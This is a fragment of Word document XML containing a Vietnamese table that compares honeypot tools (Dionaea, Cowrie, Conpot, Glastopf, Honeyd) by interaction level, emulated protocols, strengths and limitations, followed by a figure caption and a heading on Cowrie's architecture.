          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mức độ Tương tác</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dịch vụ Mô phỏng Chính</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ưu điểm Vượt trội</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hạn chế Chính</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dionaea</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium-Interaction</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB, HTTP, FTP, TFTP, MSSQL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chuyên bắt giữ sâu mạng (Worms) và mã độc tự lây qua SMB.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Không hỗ trợ tương tác dòng lệnh SSH chuyên sâu.</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10">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cowrie</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium-Interaction</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH, Telnet, SFTP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Giả lập shell Linux chân thực, ghi log TTY chi tiết, lưu giữ mã độc.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cần tinh chỉnh để tránh bị hacker phát hiện chữ ký mặc định.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Conpot</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low-Medium</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ICS/SCADA, Modbus, S7Comm, BACnet</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thu thập thông tin tấn công vào hạ tầng điều khiển công nghiệp.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chỉ phù hợp với hệ thống công nghiệp đặc thù.</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1A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Glastopf</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low-Medium</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application, HTTP, Vulnerability emu</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bắt các đợt quét lỗ hổng SQL Injection, LFI/RFI trên web.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Đã ngừng phát triển tích cực, được thay thế bởi Snare/Tanner.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Honeyd</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low-Interaction</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TCP/IP Stack, IP Daemons</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mô phỏng hàng ngàn máy chủ ảo trên một địa chỉ IP duy nhất.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Không hỗ trợ tương tác ứng dụng thực tế.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">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25">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092335"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="170158692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86400" cy="3092335"/>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2.1: Mô hình phân loại Honeypot theo mức độ tương tác (Low, Medium, High)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">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2.2 Kiến trúc và Cơ chế hoạt động của Cowrie SSH/Telnet Honeypot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
